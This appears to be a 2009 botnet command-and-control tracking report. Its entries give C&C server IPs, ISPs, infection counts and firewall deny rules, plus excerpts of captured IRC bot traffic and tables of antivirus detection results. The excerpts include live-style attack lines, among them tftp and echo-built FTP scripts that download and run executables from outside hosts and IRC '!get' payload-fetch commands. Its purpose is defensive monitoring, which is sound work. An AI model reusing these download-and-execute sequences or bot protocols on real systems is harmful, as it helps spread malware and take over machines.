Clients 13	ecuador	Activity	Domain corp-190-12-4-10-cue.puntonet.ec

Chatter Example

Client: NICK USA|2K|SP2|00|2905USER hohri 0 0 :\\002\\0034CodeD \\0038By...
Server: :eat.a.dick NOTICE USA|2K|SP2|00|2905 :*** If you are having...
Server: PONG :7B586E46
Client: JOIN ##!X5 whores
Client: USERHOST USA|2K|SP2|00|2905MODE USA|2K|SP2|00|2905 -x+iJOIN ##!X5...
Server: PONG :eat.a.dick
Client: JOIN ##!X5 whores
Server: PONG :eat.a.dick
Client: JOIN ##!X5 whores
Server: PONG :eat.a.dick
Client: JOIN ##!X5 whores

more....

BotClient Antivirus Diagnoses

AhnLab-V3	MISSED
AntiVir	MISSED
Authentium	MISSED
Avast	MISSED
AVG	MISSED
BitDefender	MISSED
CAT-QuickHeal	MISSED
ClamAV	MISSED
DrWeb	MISSED
eSafe	MISSED
eTrust-Vet	MISSED
Ewido	MISSED
FileAdvisor	MISSED
Fortinet	MISSED
F-Prot	MISSED
F-Secure	MISSED
Ikarus	MISSED
Kaspersky	MISSED
McAfee	MISSED
Microsoft	MISSED
NOD32v2	MISSED
Norman	MISSED
Panda	MISSED
Prevx1	MISSED
Rising	MISSED
Sophos	MISSED
Sunbelt	MISSED
Symantec	MISSED
TheHacker	MISSED
TrendMicro	MISSED
VBA32	MISSED
VirusBuster	MISSED
Webwasher Gateway	MISSED

Priority 13	TCP Ports 80	Filter deny ip host 82.98.86.170 any log ! 13 infects 06/11/09 to 10/31/09 fhe3rz.net	ISP sedo domain parking
Clients 13	germany	Activity	Domain fhe3rz.net

Chatter Example

Client: GET /xxxxxxx HTTP/1.0User-Agent: bHost: 203.180.17.238
Client: POST /w.php?ifc=0 HTTP/1.0Accept: image/gif, image/x-xbitmap,...
Server: GET...
Server: GET /css/724/landing/en.css HTTP/1.0Accept: */*Referer:...
Server: GET /images/724/body_bg.jpg HTTP/1.0Accept: */*Referer:...
Server: GET /images/724/td_bg.jpg HTTP/1.0Accept: */*Referer:...
Server: GET /images/724/container_bg.jpg HTTP/1.0Accept: */*Referer:...
Server: GET /images/724/keywords_bg.jpg HTTP/1.0Accept: */*Referer:...
Server: GET /images/724/bullet.jpg HTTP/1.0Accept: */*Referer:...
Server: GET /images/724/pop_cat_top.jpg HTTP/1.0Accept: */*Referer:...
Server: GET /images/724/searchtext_bg.jpg HTTP/1.0Accept: */*Referer:...
Server: GET /images/724/search.jpg HTTP/1.0Accept: */*Referer:...
Server: GET /images/724/footer_bg.jpg HTTP/1.0Accept: */*Referer:...
Client: POST /w.php?ifc=0 HTTP/1.0Accept: image/gif, image/x-xbitmap,...
Client: POST /w.php?ifc=0 HTTP/1.0Accept: image/gif, image/x-xbitmap,...

more....

BotClient Antivirus Diagnoses

AhnLab-V3	Korgo.46592
AntiVir	Padobot.Z.2
Authentium	Berbew.M
Avast	_Padobot-I
AVG	Generic7.ORM
BitDefender	Generic.208542
CAT-QuickHeal	I-Padobot.z
ClamAV	Korgo.Z
DrWeb	HangUp.26
eSafe	MISSED
eTrust-Vet	Berkor.A
Ewido	MISSED
FileAdvisor	MISSED
Fortinet	MISSED
F-Prot	Berbew.M
F-Secure	Padobot.z
Ikarus	Padobot.Z
Kaspersky	Padobot.z
McAfee	MISSED
Microsoft	Berbew.BE!dam
NOD32v2	MISSED
Norman	MISSED
Panda	MISSED
Prevx1	MISSED
Rising	Berbew.d
Sophos	Doxpar-C
Sunbelt	MISSED
Symantec	MISSED
TheHacker	MISSED
TrendMicro	BKDR_BERBEW.Q
VBA32	Padobot.z
VirusBuster	Padobot.B
Webwasher Gateway	MISSED

Priority 11	TCP Ports 8080 8080 67	Filter deny ip host 72.10.172.211 any log ! 11 infects 06/20/09 to 10/16/09 gtcomm.net	ISP globotech communications
Clients 11	canada	Activity	Domain gtcomm.net

Chatter Example

Client: dir dllcache\\tftpd.exe
Client: tftp -i 24.103.196.250 get svchost.exe wins\\SVCHOST.EXE
Client: tftp -i 24.103.196.250 get dllhost.exe wins\\DLLHOST.EXE
Client: USER jseabq jseabq jseabq :dqhawgsvzjhxsrsm
Client: NICK ErEDHMyl
Client: MODE ErEDHMyl +xi
Client: GET /rs3.exe HTTP/1.0Host: idfc.info
Server: GET /f.exe HTTP/1.0Host: idfc.info
Client: JOIN #las6 USERHOST ErEDHMylMODE #m +smntuPRIVMSG #m...
Client: MODE #las6 +smntu
Server: :hub.20582.com 482 ErEDHMyl #las6 :You\\'re not channel operator

more....

BotClient Antivirus Diagnoses

AhnLab-V3	Virut
AntiVir	Virut.AT
Authentium	Virut.AG
Avast	_Virtob
AVG	RBot.KB
BitDefender	IRC-Generic.3619
CAT-QuickHeal	Virut.Y
ClamAV	Small-4287
DrWeb	IRC.Sdbot.2665
eSafe	TRCrypt.nspm
eTrust-Vet	Virut.6640
Ewido	MISSED
FileAdvisor	MISSED
Fortinet	Nepoe.EM!tr.bdr
F-Prot	Virut.AG
F-Secure	Nepoe.em
Ikarus	MISSED
Kaspersky	Nepoe.em
McAfee	Virut.gen.a
Microsoft	Virut.AA
NOD32v2	MISSED
Norman	Virut.AH
Panda	Virutas.AH
Prevx1	MISSED
Rising	Virut.al
Sophos	Virut-Gen
Sunbelt	MISSED
Symantec	Virut.W
TheHacker	Virut.genS
TrendMicro	PE_VIRUT.AT
VBA32	Nepoe.em
VirusBuster	PoeBot.OB
Webwasher Gateway	MISSED

Priority 10	TCP Ports 65520 65520 91	Filter deny ip host 91.121.221.157 any log ! 10 infects 08/22/09 to 09/05/09 -	ISP fr-ovh
Clients 10	france	Activity	Domain -

Chatter Example

Client: dir dllcache\\tftpd.exe
Client: tftp -i 114.203.72.50 get svchost.exe wins\\SVCHOST.EXE
Client: tftp -i 114.203.72.50 get dllhost.exe wins\\DLLHOST.EXE
Client: NICK lejfnledUSER e020500 . . :_
Client: Service Pack 2JOIN &virtu
Server: :l. PRIVMSG lejfnled :!get http:/gidromash.cn/oc/box.txt
Client: GET /oc/box.txt HTTP/1.0User-Agent: DownloadHost:...
Server: GET /op/lgate.php?n=6D05DF620DE704D8 HTTP/1.0Accept:...
Server: GET /lib/mr.txt HTTP/1.0Accept: */*User-Agent: Mozilla/4.0...
Server: PONG :l.
Client: JOIN &virtu
Server: PONG :l.
Client: JOIN &virtu
Server: PONG :l.
Client: JOIN &virtu
Server: PONG :l.
Client: JOIN &virtu
Server: PONG :l.
Client: JOIN &virtu
Server: PONG :l.
Client: JOIN &virtu
Server: PONG :l.
Client: JOIN &virtu

more....

BotClient Antivirus Diagnoses

AhnLab-V3	MISSED
AntiVir	MISSED
Authentium	MISSED
Avast	MISSED
AVG	MISSED
BitDefender	MISSED
CAT-QuickHeal	MISSED
ClamAV	MISSED
DrWeb	MISSED
eSafe	MISSED
eTrust-Vet	MISSED
Ewido	MISSED
FileAdvisor	MISSED
Fortinet	MISSED
F-Prot	MISSED
F-Secure	Suspicious_Malware!Gemini
Ikarus	Hostil
Kaspersky	MISSED
McAfee	MISSED
Microsoft	Hostil.F
NOD32v2	MISSED
Norman	MISSED
Panda	MISSED
Prevx1	MISSED
Rising	MISSED
Sophos	MalEncPk-IF
Sunbelt	MISSED
Symantec	MISSED
TheHacker	MISSED
TrendMicro	MISSED
VBA32	MISSED
VirusBuster	MISSED
Webwasher Gateway	MISSED

Priority 10	TCP Ports 5190 67 6556 5190 72	Filter deny ip host 83.68.16.6 any log ! 10 infects 06/17/09 to 09/19/09 xs4all.nl	ISP xs4all internet bv
Clients 10	netherlands	Activity	Domain xs4all.nl

Chatter Example

Client: USER qifonx qifonx qifonx :imeqgcebisvovxly
Client: NICK znbXghHO
Server: NOTICE AUTH :*** Looking up your hostname...NOTICE AUTH :***...
Client: MODE znbXghHO +xi
Client: JOIN #las6 USERHOST znbXghHO
Server: :znbXghHO!qifonx@192.168.1.192 JOIN :#las6
Client: MODE #las6 +smntu
Server: :norks.org MODE #las6 +nt:norks.org 353 znbXghHO = #las6 :@wloos...
Client: USER qifonx qifonx qifonx :imeqgcebisvovxly
Server: NOTICE AUTH :*** Looking up your hostname...NOTICE AUTH :***...
Server: NICK znbXghHO
Client: USER qifonx qifonx qifonx :imeqgcebisvovxlyNICK znbXghHO
Client: MODE znbXghHO +xi
Client: JOIN #las6 USERHOST znbXghHO
Server: :znbXghHO!qifonx@192.168.1.192 JOIN :#las6
Client: MODE #las6 +smntu
Server: :norks.org MODE #las6 +nt:norks.org 353 znbXghHO = #las6 :@wloos...

more....

BotClient Antivirus Diagnoses

AhnLab-V3	Win-Nepoe.58880
AntiVir	TRCrypt.XPACK.Gen
Authentium	Nepoe.A
Avast	MISSED
AVG	SHeur2.AIJS
BitDefender	IRC-Generic.5049
CAT-QuickHeal	Nepoe.hm
ClamAV	MISSED
DrWeb	Packed.162
eSafe	TRCrypt.XPACK
eTrust-Vet	Linkbot.VJ
Ewido	MISSED
FileAdvisor	MISSED
Fortinet	Nepoe.YW!tr
F-Prot	Nepoe.A
F-Secure	Nepoe.hm
Ikarus	Packer.Krunchy.B
Kaspersky	Nepoe.hm
McAfee	MISSED
Microsoft	Poebot
NOD32v2	MISSED
Norman	Smalltroj.dam
Panda	BckNepoe.F
Prevx1	MISSED
Rising	Undef.dnb
Sophos	MalGeneric-A
Sunbelt	MISSED
Symantec	IRCBot
TheHacker	MISSED
TrendMicro	BKDR_NEPOE.CW
VBA32	Nepoe.hm
VirusBuster	Nepoe.DL
Webwasher Gateway	MISSED

Priority 10	TCP Ports 6556 194	Filter deny ip host 194.109.11.65 any log ! 10 infects 06/21/09 to 10/04/09 xs4all.net	ISP xs4all ppp _30 router subnets
Clients 10	netherlands	Activity	Domain xs4all.net

Chatter Example

Client: dir dllcache\\tftpd.exe
Client: tftp -i 67.10.66.79 get svchost.exe wins\\SVCHOST.EXE
Client: tftp -i 67.10.66.79 get dllhost.exe wins\\DLLHOST.EXE
Client: USER ylxs ylxs ylxs :xLegion/0x029NICK ylxs
Server: NOTICE AUTH :*** Looking up your hostname...NOTICE AUTH :***...
Client: JOIN #29# g3t0u7
Server: :ylxs!ylxs@192.168.1.179 JOIN :#29# g3t0u7
Server: :mindleak.com MODE #29# g3t0u7 +nt:mindleak.com 353 ylxs = #29#...
Client: USER kegkqj kegkqj kegkqj :xLegion/0x029NICK kegkqj
Server: NOTICE AUTH :*** Looking up your hostname...NOTICE AUTH :***...

more....

BotClient Antivirus Diagnoses

AhnLab-V3	IRCBot.19968.B
AntiVir	SdBot.19968
Authentium	Sdbot.MIU
Avast	_Agent-IDE
AVG	Agent.10.BA
BitDefender	Generic.Sdbot.99B2E6B1
CAT-QuickHeal	SdBot.afu
ClamAV	Codbot-22
DrWeb	Detox.based
eSafe	SdBot.afu
eTrust-Vet	Toxbot!generic
Ewido	Agent.ri
FileAdvisor	MISSED
Fortinet	DcomRpc.AFU!tr.bdr
F-Prot	Sdbot.MIU
F-Secure	Horst.gen33
Ikarus	Agent.ri
Kaspersky	Agent.ri
McAfee	Sdbot.gen
Microsoft	Codbot.BU
NOD32v2	Codbot
Norman	SDBot.SML
Panda	Codbot.BS.worm
Prevx1	MISSED
Rising	Codbot.cr
Sophos	Codbot-AB
Sunbelt	MISSED
Symantec	IRCbot
TheHacker	BackdoorSdBot.afu
TrendMicro	MISSED
VBA32	SdBot.afu
VirusBuster	Rbot.Gen.15
Webwasher Gateway	SdBot.19968

Priority 8	TCP Ports 3305	Filter deny ip host 200.49.145.197 any log ! 8 infects 09/04/09 to 11/02/09 allytech.com	ISP allytech s.a
Clients 8	argentina	Activity	Domain allytech.com

Chatter Example

Client: dir dllcache\\tftpd.exe
Client: tftp -i 173.16.120.174 get svchost.exe wins\\SVCHOST.EXE
Client: tftp -i 173.16.120.174 get dllhost.exe wins\\DLLHOST.EXE
Client: PASS secretpass
Client: NICK P|a6xnr2frjUSER a5fik9m7o * 0 :USA|2K|445
Server: :hub.49011.net 001 P|a6xnr2frj...
Client: USERHOST P|a6xnr2frj
Server: :hub.49011.net 302 P|a6xnr2frj...
Client: USERHOST P|a6xnr2frjMODE P|a6xnr2frj JOIN #mm RSA

more....

BotClient Antivirus Diagnoses

AhnLab-V3	IRCBot.Gen
AntiVir	TRATRAPS.Gen
Authentium	MISSED
Avast	_DCom-F
AVG	SHeur2.BBMT
BitDefender	Generic.Mydoom.638E6D7B
CAT-QuickHeal	I-Kolabc.gza
ClamAV	MISSED
DrWeb	HLLW.Piabot.4
eSafe	MISSED
eTrust-Vet	MISSED
Ewido	MISSED
FileAdvisor	MISSED
Fortinet	Kolabc.GZA!im
F-Prot	MISSED
F-Secure	Kolabc.gza
Ikarus	Kolabc
Kaspersky	Kolabc.gza
McAfee	MISSED
Microsoft	Kolabc.C
NOD32v2	MISSED
Norman	Akbot.BJT
Panda	Gaobot.OXI.worm
Prevx1	MISSED
Rising	Dropper.Undef.GEN
Sophos	MalBehav-104
Sunbelt	Generic!BT
Symantec	Spybot.Worm
TheHacker	MISSED
TrendMicro	KOLABC.GB
VBA32	Kolabc.gza
VirusBuster	RBot.Gen.3
Webwasher Gateway	MISSED

Priority 8	TCP Ports 65520 91	Filter deny ip host 91.212.220.156 any log ! 8 infects 08/23/09 to 09/07/09 -	ISP group vertical ltd
Clients 8	russian federation	Activity	Domain -

Chatter Example

Client: GET /x.exe HTTP/1.0User-Agent: Mozilla/4.0Host:...
Client: NICK dtugkmbeUSER i020501 . . :-
Client: JOIN &virtu
Server: :k. PRIVMSG dtugkmbe :!get http:/gidromash.cn/oc/box.txt
Server: PONG :k.
Client: JOIN &virtu
Server: PONG :k.
Client: JOIN &virtu
Server: PONG :k.
Client: JOIN &virtu
Server: PONG :k.
Client: JOIN &virtu
Server: NICK jddwnomeUSER n020501 . . :-
Client: JOIN &virtu
Server: :l. PRIVMSG jddwnome :!get http:/gidromash.cn/oc/box.txt
Server: PONG :l.
Client: JOIN &virtu
Server: PONG :l.
Client: JOIN &virtu

more....

BotClient Antivirus Diagnoses

AhnLab-V3	Virut.B
AntiVir	Virut.AX
Authentium	Korgo.V
Avast	_Virtob
AVG	Korgo.A
BitDefender	Padobot.BV.Dam
CAT-QuickHeal	Virut.Z
ClamAV	Virut-54
DrWeb	Lsabot
eSafe	MISSED
eTrust-Vet	Virut.7115
Ewido	MISSED
FileAdvisor	MISSED
Fortinet	Virut.AV
F-Prot	Korgo.V
F-Secure	MISSED
Ikarus	Padobot.M
Kaspersky	Padobot.m
McAfee	Virut.gen.a
Microsoft	Korgo.V
NOD32v2	MISSED
Norman	Korgo.V
Panda	Virutas.FG
Prevx1	MISSED
Rising	Virut.an
Sophos	Virut-W
Sunbelt	MISSED
Symantec	Virut.W
TheHacker	Virut.av
TrendMicro	PE_VIRUT.AV
VBA32	Virut.2
VirusBuster	Padobot.D
Webwasher Gateway	MISSED

Priority 7	TCP Ports 3305	Filter deny ip host 211.233.45.253 any log ! 7 infects 09/01/09 to 09/08/09 kidc.net	ISP korea internet data center inc
Clients 7	korea_ republic of	Activity	Domain kidc.net

Chatter Example

Client: dir dllcache\\tftpd.exe
Client: tftp -i 96.8.226.33 get svchost.exe wins\\SVCHOST.EXE
Client: tftp -i 96.8.226.33 get dllhost.exe wins\\DLLHOST.EXE
Client: PASS secretpass
Client: NICK P|tyz4nprpcUSER v7sfuv623 * 0 :USA|XP|126
Server: :hub.49523.net 001 P|tyz4nprpc...
Client: USERHOST P|tyz4nprpc
Server: :hub.49523.net 302 P|tyz4nprpc...
Client: USERHOST P|tyz4nprpcMODE P|tyz4nprpc JOIN #mm RSA

more....

BotClient Antivirus Diagnoses

AhnLab-V3	MISSED
AntiVir	TRDropper.Gen
Authentium	Threat-HLLIYE!Eldorado
Avast	_DCom-F
AVG	Heur
BitDefender	Packer.Yoda.A
CAT-QuickHeal	MISSED
ClamAV	MISSED
DrWeb	HLLW.Piabot.4
eSafe	MISSED
eTrust-Vet	MISSED
Ewido	MISSED
FileAdvisor	MISSED
Fortinet	MISSED
F-Prot	Threat-HLLIYE!Eldorado
F-Secure	MISSED
Ikarus	Exploit.MS06040
Kaspersky	Heur.Generic
McAfee	MISSED
Microsoft	Exploit_MS06040.gen
NOD32v2	MISSED
Norman	MISSED
Panda	TrjCI.A
Prevx1	MISSED
Rising	MISSED
Sophos	MalPacker
Sunbelt	MISSED
Symantec	MISSED
TheHacker	MISSED
TrendMicro	PAK_Generic.001
VBA32	MISSED
VirusBuster	PackedYoda
Webwasher Gateway	MISSED

Priority 5	TCP Ports 3305	Filter deny ip host 203.146.251.62 any log ! 5 infects 06/11/09 to 11/03/09 csloxinfo.net	ISP reassign to paidc idc suapha-idc customer
Clients 5	thailand	Activity	Domain csloxinfo.net

Chatter Example

Client: PASS secretpass
Client: NICK P|ot4z09bbzUSER lnv4ddgy3 * 0 :USA|XP|651
Server: :hub.62014.net 001 P|ot4z09bbz...
Client: USERHOST P|ot4z09bbz
Server: :hub.62014.net 302 P|ot4z09bbz...
Client: USERHOST P|ot4z09bbzMODE P|ot4z09bbz JOIN #mm RSA
Client: PRIVMSG #mm...

more....

BotClient Antivirus Diagnoses

AhnLab-V3	MISSED
AntiVir	TRDropper.Gen
Authentium	Threat-HLLIYE!Eldorado
Avast	_DCom-F
AVG	Heur
BitDefender	Packer.Yoda.A
CAT-QuickHeal	MISSED
ClamAV	MISSED
DrWeb	HLLW.Piabot.4
eSafe	MISSED
eTrust-Vet	MISSED
Ewido	MISSED
FileAdvisor	MISSED
Fortinet	MISSED
F-Prot	Threat-HLLIYE!Eldorado
F-Secure	MISSED
Ikarus	Exploit.MS06040
Kaspersky	Heur.Generic
McAfee	MISSED
Microsoft	Exploit_MS06040.gen
NOD32v2	MISSED
Norman	MISSED
Panda	TrjCI.A
Prevx1	MISSED
Rising	MISSED
Sophos	MalPacker
Sunbelt	MISSED
Symantec	MISSED
TheHacker	MISSED
TrendMicro	PAK_Generic.001
VBA32	MISSED
VirusBuster	PackedYoda
Webwasher Gateway	MISSED

Priority 4	TCP Ports 65520 65520 216	Filter deny ip host 218.93.205.23 any log ! 4 infects 08/19/09 to 08/20/09 163data.com.cn	ISP chinanet jiangsu province network
Clients 4	china	Activity	Domain 163data.com.cn

Chatter Example

Client: GET /x.exe HTTP/1.0User-Agent: Mozilla/4.0Host: 85.132.5.169:1737
Client: NICK hxpxonzsUSER c020501 . . :-
Client: JOIN &virtu
Server: :i. PRIVMSG hxpxonzs :!get http:/dretis.cn/oc/box.txt

more....

BotClient Antivirus Diagnoses

AhnLab-V3	Virut.B
AntiVir	Virut.AX
Authentium	Korgo.W
Avast	_Virtob
AVG	Korgo.D
BitDefender	Generic.1674959
CAT-QuickHeal	Virut.Z
ClamAV	MISSED
DrWeb	Lsabot
eSafe	Virut.n
eTrust-Vet	Virut.7115
Ewido	MISSED
FileAdvisor	MISSED
Fortinet	Virut.AV
F-Prot	Korgo.W
F-Secure	Virut.av
Ikarus	Korgo.K
Kaspersky	Virut.av
McAfee	Virut.gen.a
Microsoft	Korgo.AB
NOD32v2	MISSED
Norman	Korgo.Y
Panda	Virutas.FG
Prevx1	MISSED
Rising	Junk.Virut.a
Sophos	Virut-W
Sunbelt	Generic!BT
Symantec	Virut.W
TheHacker	Virut.av
TrendMicro	PE_VIRUT.AV
VBA32	Virut.2
VirusBuster	Korgo.AB
Webwasher Gateway	MISSED

Priority 3	TCP Ports 6668 6667	Filter deny ip host 91.121.83.177 any log ! 3 infects 08/22/09 to 08/22/09 gergosnet.com	ISP ovh sas
Clients 3	france	Activity	Domain gergosnet.com

Chatter Example

Client: USER 1
Server: 331 Password required
Client: PASS 1
Server: 230 User logged in.
Server: RETR mode.exe
Server: 150 Opening BINARY mode data connection
Server: 221 Goodbye happy r00ting.
Client: NICK gyreobciUSER cwbkcdugs 0 0 :gyreobci
Server: :irc.priv8net.com NOTICE AUTH :*** Looking up your...
Client: USERHOST gyreobci
Client: MODE gyreobci +xiJOIN ##Stab## qifort1USERHOST gyreobciMODE...
Server: PONG :irc.priv8net.com
Client: JOIN ##Stab## qifort1
Server: PONG :irc.priv8net.com
Client: JOIN ##Stab## qifort1
Server: PONG :irc.priv8net.com
Client: JOIN ##Stab## qifort1

more....

BotClient Antivirus Diagnoses

AhnLab-V3	MISSED
AntiVir	MISSED
Authentium	MISSED
Avast	MISSED
AVG	MISSED
BitDefender	MISSED
CAT-QuickHeal	MISSED
ClamAV	MISSED
DrWeb	MISSED
eSafe	MISSED
eTrust-Vet	MISSED
Ewido	MISSED
FileAdvisor	MISSED
Fortinet	MISSED
F-Prot	MISSED
F-Secure	Suspicious_Malware!Gemini
Ikarus	MISSED
Kaspersky	MISSED
McAfee	MISSED
Microsoft	MISSED
NOD32v2	MISSED
Norman	MISSED
Panda	MISSED
Prevx1	MISSED
Rising	MISSED
Sophos	MISSED
Sunbelt	MISSED
Symantec	MISSED
TheHacker	MISSED
TrendMicro	MISSED
VBA32	MISSED
VirusBuster	MISSED
Webwasher Gateway	MISSED

Priority 2	TCP Ports 65520 216	Filter deny ip host 221.5.74.40 any log ! 2 infects 08/18/09 to 08/18/09 cncnet.net	ISP china unicom guangdong province network
Clients 2	china	Activity	Domain cncnet.net

Chatter Example

Client: NICK tztznbvfUSER f020501 . . :-
Server: NICK tztznbvfUSER f020501 . . :-JOIN &virtu
Server: :j. PRIVMSG tztznbvf :!get http:/dretis.cn/oc/box.txt
Client: GET /oc/box.txt HTTP/1.0User-Agent: DownloadHost:...
Server: GET /op/lgate.php?n=94AEEEDFFCB64848 HTTP/1.0Accept:...
Server: GET /bt5/fout.php HTTP/1.0Accept: */*User-Agent: Mozilla/4.0...
Server: GET /lib/bot.txt HTTP/1.0Accept: */*User-Agent: Mozilla/4.0...
Server: GET /lib/abb.txt HTTP/1.0Accept: */*User-Agent: Mozilla/4.0...
Server: GET /ag/lo.txt HTTP/1.0Accept: */*User-Agent: Mozilla/4.0...
Server: GET /dll/mal.txt HTTP/1.0Accept: */*User-Agent: Mozilla/4.0...
Server: GET...

more....

BotClient Antivirus Diagnoses

AhnLab-V3	MISSED
AntiVir	MISSED
Authentium	MISSED
Avast	MISSED
AVG	MISSED
BitDefender	MISSED
CAT-QuickHeal	MISSED
ClamAV	MISSED
DrWeb	MISSED
eSafe	MISSED
eTrust-Vet	MISSED
Ewido	MISSED
FileAdvisor	MISSED
Fortinet	MISSED
F-Prot	MISSED
F-Secure	Suspicious_Malware!Gemini
Ikarus	Trojan-Downloader.Obitel
Kaspersky	MISSED
McAfee	MISSED
Microsoft	TrojanDownloader_Obitel.gen!C
NOD32v2	MISSED
Norman	MISSED
Panda	MISSED
Prevx1	MISSED
Rising	MISSED
Sophos	MISSED
Sunbelt	MISSED
Symantec	MISSED
TheHacker	MISSED
TrendMicro	MISSED
VBA32	MISSED
VirusBuster	MISSED
Webwasher Gateway	MISSED

Priority 2	TCP Ports 13001 12351	Filter deny ip host 122.160.232.194 any log ! 2 infects 09/13/09 to 10/30/09 122.airtelbroadband.in	ISP abts-dsl-del
Clients 2	india	Activity	Domain 122.airtelbroadband.in

Chatter Example

Client: echo open 85.179.166.148 17323>.pif C:\\WINDOWS\\system32>
Client: echo user a a>>.pif C:\\WINDOWS\\system32>
Client: echo binary>>.pif C:\\WINDOWS\\system32>
Client: echo GET iexplorer.exe>>.pif C:\\WINDOWS\\system32>
Client: echo bye>>.pif C:\\WINDOWS\\system32>
Client: echo @echo off >c.batC:\\WINDOWS\\system32>
Client: echo ftp -n -v -s:.pif >>c.batC:\\WINDOWS\\system32>
Client: echo iexplorer.exe >>c.batC:\\WINDOWS\\system32>
Client: echo del .pif >>c.batC:\\WINDOWS\\system32>
Client: echo del /F c.bat >>c.batC:\\WINDOWS\\system32>
Client: echo exit /y >>c.batC:\\WINDOWS\\system32>
Client: USER a
Client: PASS a
Server: RETR iexplorer.exe
Client: NICK `tkhjqhirUSER `tkhjqhir 0 0 :`tkhjqhir
Server: :irc.priv8net.com NOTICE AUTH :*** Looking up your hostname...
Client: JOIN #.has hs
Client: USERHOST `tkhjqhirJOIN #.has hsUSERHOST `tkhjqhirJOIN #.has...
Server: :`tkhjqhir!~tkhjqhir@183C7886.415835BD.ED5D58B5.IP JOIN...
Server: PONG :irc.priv8net.com
Client: JOIN #.has hs
Server: PONG :irc.priv8net.com
Client: JOIN #.has hs
Server: PONG :irc.priv8net.com
Client: JOIN #.has hs
Server: PONG :irc.priv8net.com
Client: JOIN #.has hs
Server: PONG :irc.priv8net.com
Client: JOIN #.has hs
Server: PONG :irc.priv8net.com
Client: JOIN #.has hs
Server: PONG :irc.priv8net.com
Client: JOIN #.has hs
Server: PONG :irc.priv8net.com
Client: JOIN #.has hs

more....

BotClient Antivirus Diagnoses

AhnLab-V3	MISSED
AntiVir	TRSpy.Games.A
Authentium	STZ_like!Generic
Avast	MISSED
AVG	PolyCrypt
BitDefender	MISSED
CAT-QuickHeal	MISSED
ClamAV	MISSED
DrWeb	MISSED
eSafe	MISSED
eTrust-Vet	MISSED
Ewido	MISSED
FileAdvisor	MISSED
Fortinet	MISSED
F-Prot	STZ_like!Generic
F-Secure	Suspicious_Malware!Gemini
Ikarus	Virut.n
Kaspersky	MISSED
McAfee	MISSED
Microsoft	MISSED
NOD32v2	MISSED
Norman	MISSED
Panda	MISSED
Prevx1	MISSED
Rising	MISSED
Sophos	MISSED
Sunbelt	MISSED
Symantec	MISSED
TheHacker	MISSED
TrendMicro	MISSED
VBA32	MISSED
VirusBuster	MISSED
Webwasher Gateway	Spy.Games.A

Priority 2	TCP Ports 2345	Filter deny ip host 82.114.87.50 any log ! 2 infects 08/04/09 to 08/11/09 atk-ks.org	ISP yu-kujtesa
Clients 2	serbia and montenegro	Activity	Domain atk-ks.org

Chatter Example

Client: GET /mumie.exe HTTP/1.0Accept: */*User-Agent: Mozilla/4.0...
Client: NICK NT50|32580900USER NT50|32580900 0 0 :NT50|32580900
Server: :irc.oc256.com NOTICE AUTH :*** Looking up your hostname...
Server: :irc.oc256.com NOTICE AUTH :*** Couldn\\'t resolve your hostname;...
Server: :irc.oc256.com NOTICE NT50|32580900 :*** If you are having...
Server: PONG :A18EEE60
Client: JOIN #!MUM! Mixxx74
Server: :NT50|32580900 MODE NT50|32580900 :+i
Client: USERHOST NT50|32580900MODE NT50|32580900 +n+BJOIN #!MUM!...
Server: :irc.oc256.com 501 NT50|32580900 :Unknown MODE flag
Server: PONG :irc.oc256.com
Server: PONG :irc.oc256.com

more....

BotClient Antivirus Diagnoses

AhnLab-V3	MISSED
AntiVir	MISSED
Authentium	MISSED
Avast	MISSED
AVG	MISSED
BitDefender	MISSED
CAT-QuickHeal	MISSED
ClamAV	MISSED
DrWeb	MISSED
eSafe	MISSED
eTrust-Vet	MISSED
Ewido	MISSED
FileAdvisor	MISSED
Fortinet	MISSED
F-Prot	MISSED
F-Secure	MISSED
Ikarus	MISSED
Kaspersky	MISSED
McAfee	MISSED
Microsoft	MISSED
NOD32v2	MISSED
Norman	MISSED
Panda	MISSED
Prevx1	MISSED
Rising	MISSED
Sophos	MISSED
Sunbelt	MISSED
Symantec	MISSED
TheHacker	MISSED
TrendMicro	MISSED
VBA32	MISSED
VirusBuster	MISSED
Webwasher Gateway	MISSED

Priority 2	TCP Ports 3305	Filter deny ip host 210.166.223.51 any log ! 2 infects 07/12/09 to 08/03/09 hitachi-system.co.jp	ISP prox-communicator(prox system design inc.)
Clients 2	japan	Activity	Domain hitachi-system.co.jp

Chatter Example

Client: PASS secretpass
Client: NICK P|jsmmnebfrUSER jy08fve9z * 0 :USA|XP|155
Server: :hub.4668.net 001 P|jsmmnebfr...
Client: USERHOST P|jsmmnebfr
Client: USERHOST P|jsmmnebfrMODE P|jsmmnebfr JOIN #mm RSA
Server: :hub.4668.net 302 P|jsmmnebfr...

more....

BotClient Antivirus Diagnoses

AhnLab-V3	Kolabc.141454.K
AntiVir	TRDropper.Gen
Authentium	Threat-HLLIYE!Eldorado
Avast	_DCom-F
AVG	Heur
BitDefender	Packer.Yoda.A
CAT-QuickHeal	I-Kolabc.gmv
ClamAV	MISSED
DrWeb	HLLW.Piabot.3
eSafe	TRDropper
eTrust-Vet	Sdbot.NJ
Ewido	MISSED
FileAdvisor	MISSED
Fortinet	PossibleThreat
F-Prot	Threat-HLLIYE!Eldorado
F-Secure	Kolabc.gmv
Ikarus	Kolabc
Kaspersky	Kolabc.gmv
McAfee	Generic.dx!bz
Microsoft	Kolabc.C
NOD32v2	MISSED
Norman	Smalltroj.NVNC
Panda	Gaobot.OXI.worm
Prevx1	MISSED
Rising	MS06-040.f
Sophos	MalPacker
Sunbelt	MISSED
Symantec	Spybot.Worm
TheHacker	Kolabc.gmv
TrendMicro	TROJ_LSADCOM.MCL
VBA32	Kolabc.gmv
VirusBuster	Rbot.AKMS
Webwasher Gateway	MISSED

Priority 2	TCP Ports 3305	Filter deny ip host 217.18.77.190 any log ! 2 infects 08/03/09 to 08/03/09 axoft.nl	ISP qweb
Clients 2	netherlands	Activity	Domain axoft.nl

Chatter Example

Server: echo open 130.13.164.110 40102 >> asr_plmye &echo user plmyen...
Client: USER plmyen
Client: PASS plmyen
Client: open 130.13.164.110 40102 220user plmyen plmyen 331
Server: RETR asr_68418.exe
Server: echo open 130.13.164.110 40102 >> asr_fscuf &echo user fscufu...
Client: USER fscufu
Client: PASS fscufu
Client: PASS secretpass
Client: NICK P|b83hbs1b6USER mg28508k3 * 0 :USA|2K|053
Server: :hub.11433.net 001 P|b83hbs1b6...
Client: USERHOST P|b83hbs1b6
Client: USERHOST P|b83hbs1b6MODE P|b83hbs1b6 JOIN #mm RSA
Server: :hub.11433.net 302 P|b83hbs1b6...
Server: PING :hub.11433.net
Server: PONG hub.11433.net
Server: PING :hub.11433.net
Server: PONG hub.11433.net

more....

BotClient Antivirus Diagnoses

